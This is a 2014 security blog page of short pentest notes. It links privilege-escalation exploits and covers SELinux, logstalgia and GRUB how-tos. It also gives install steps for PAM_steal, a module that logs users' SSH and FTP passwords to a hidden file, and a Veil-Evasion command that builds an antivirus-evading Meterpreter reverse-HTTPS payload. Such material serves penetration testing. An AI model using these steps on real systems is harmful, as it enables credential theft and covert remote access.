CVE Feeds

Jul 23, 2014

Some Priviledge Escalation in Linux and Windows XP on 22/07/2014

Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation

http://www.exploit-db.com/exploits/34112/

 Microsoft XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation

 http://www.exploit-db.com/exploits/34131/

Linux Kernel ptrace/sysret - Local Privilege Escalation

http://www.exploit-db.com/exploits/34134/

 




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Video: Ruby Programming Tutorial

Youtube Link Channel: https://www.youtube.com/playlist?list=PLMK2xMz5H5Zv8eC8b4K6tMaE1-Z9FgSOp


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 22, 2014

Article: ทดสอบแงะ Baidu แบบคร่าวๆ

บทความนี้ผมทำเล่นๆและใช้งานไม่นานอาจจะไม่ครบถ้วนครับ

https://db.tt/FmFb5KdT


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 21, 2014

BSides Cleveland 2014 Videos

http://www.irongeek.com/i.php?page=videos/bsidescleveland2014/mainlist

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Create rules for SELinux Allow

From logs (Audit log or messages log)
 
type=AVC msg=audit(1218128130.653:334): avc:  denied  { connectto } for  pid=9111 comm="smtpd" path="/var/spool/postfix/postgrey/socket"
scontext=system_u:system_r:postfix_smtpd_t:s0 tcontext=system_u:system_r:initrc_t:s0 tclass=unix_stream_socket
type=AVC msg=audit(1218128130.653:334): avc:  denied  { write } for  pid=9111 comm="smtpd" name="socket" dev=sda6 ino=39977017
scontext=system_u:system_r:postfix_smtpd_t:s0 tcontext=system_u:object_r:postfix_spool_t:s0 tclass=sock_file  
 
Create the rules with  
# grep smtpd_t /var/log/audit/audit.log | audit2allow -M postgreylocal 

We then load our postgrey policy module using the 'semodule' command into the current SELinux policy:
# semodule -i postgreylocal.pp 

Source: http://wiki.centos.org/HowTos/SELinux


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 20, 2014

Howto: Setup logstalgia - website access log visualization

1. Install dependency
apt-get install glew-utils libglew-dev libsdl1.2-dev libsdl-image1.2-dev


2. Compile and Install package 
$ ./configure && make && make install

3. Use it with
$ logstalgia path-of-access.log file
$ logstalgia /var/log/apache2/access.log

Live monitoring
$ tail -f /var/log/apache2/access.log | logstalgia -





If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 19, 2014

Tools: PAM_steal - Monitoring password PAM

Typically pentest’s attack can be presented by the following schema:

perimeter -> command execution -> privileges escalation -> ...
The next step for pentesters is to gain privileges at other machines.
For example, it can be done by stealing credentials (one of many methods).
Passwords at local machine will be hashed and it's not so good to crack it due to the time.

SSH MITM (tool: http://www.signedness.org/tools/mitm-ssh.tgz) is a good one. It should be noticed though that passwords can be shared between many services and thus is also necessary.

PAM (Pluggable Authentification Module) provide dynamic authorization for applications and services in a Linux system. Our password logger plugin for PAM can be found here: https://github.com/ONsec-Lab/scripts/tree/master/pam_steal

This is a good point after rooting machines during penetration tests.

Install process:
./make.sh
vim /etc/pam.d/common-auth
add "auth required pam_steal.so" into it
Then check /tmp/.steal.log - all FTP/SSH and other PAM-based daemon's passwords will be there!

Source: http://lab.onsec.ru/2014/07/pamsteal-plugin-released.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: OSUETA - A simple Python script to exploit the OpenSSH User Enumeration Timing Attack

OSUETA stands for OpenSSH User Enumeration Timing Attack and is a small script written in Python to exploit a bug present in versions 5 . * and 6. * of OpenSSH . In these versions during the authentication process, you may obtain a list of users in the system discriminated by the time it takes the system to evaluate an arbitrarily long password.

If the user is present, the time it takes the server to respond is larger. For example, to allow users found present in a system , this tool can be useful in penetration testing to shorten in brute force. The script also has the ability to establish a Denial of Service attack in the ssh service.

Source: https://github.com/c0r3dump3d/osueta


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 17, 2014

Howto: Password Protection for Grub Bootloader in Ubuntu 14.04

1. Generate password with grub-mkpasswd-pbkdf2 command
2. Edit /etc/grub.d/00_header. Add these line to bottom of file.
#### For protect grub boot loader
cat << EOF
set superusers="youruser"
password_pbkdf2 youruser  <your_password_that_got_from_step#1>

EOF

3.  Edit /etc/grub.d/10_linux, in line 117. Add "--users youruser" between "with Linux" and "os" such as
title="$(gettext_printf "%s, with Linux %s (%s)" --users adminlocal "${os}" "${version}" "$(gettext "${GRUB_RECOVERY_TITLE}")")" ;;

4. Run command with grub-mkconfig
# grub-mkconfig -o /boot/grub/grub.cfg

5. Done

** if you want to not ask in normal boot loader, add "--unrestricted" into boot entry. Such as
menuentry 'Ubuntu' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-d7a144cb-230e-4134-888e-a6e5840e26d0' --unrestricted
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 14, 2014

Howto: Bypassing AV with Veil-Evasion

Full article:: https://www.netspi.com/blog/entryid/234/bypassing-av-with-veil-evasion

There are a couple of built in encoders in Metasploit (shikata ga nai is the most popular one), but these signatures have been updated in many Antivirus solutions, resulting in detection.
Veil-Evasion, This tool comes with thirty different payloads in C, C#, PowerShell, and Python languages.
Python versions, simply because it was the only language in Veil-Evasion that supported Meterpreter reverse HTTPS connections (until recently). This is beneficial for shells because everything will be encrypted with SSL, preventing the commands and results from being transmitted in the clear and potentially being discovered by an IDS or IPS system. Another benefit of using Python is the ability to make contained payloads. This means that all the Meterpreter code needed for the reverse https connection is already included instead of only being a stager that downloads the rest of the code to run.
Veil-Evasion also has command line switches that allow for easy scripting. This makes it dead simple to generate dynamic Veil-encoded Meterpreter payloads. Below is an example of a python reverse_https_contained Meterpreter executable using pyherion encoding being generated through the command line:

/root/tools/Github/Veil/Veil-Evasion/Veil-Evasion.py -p python/meterpreter/rev_https_contained -c LHOST=127.0.0.1 LPORT=443 use_pyherion=Y --overwrite -o malicious


 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |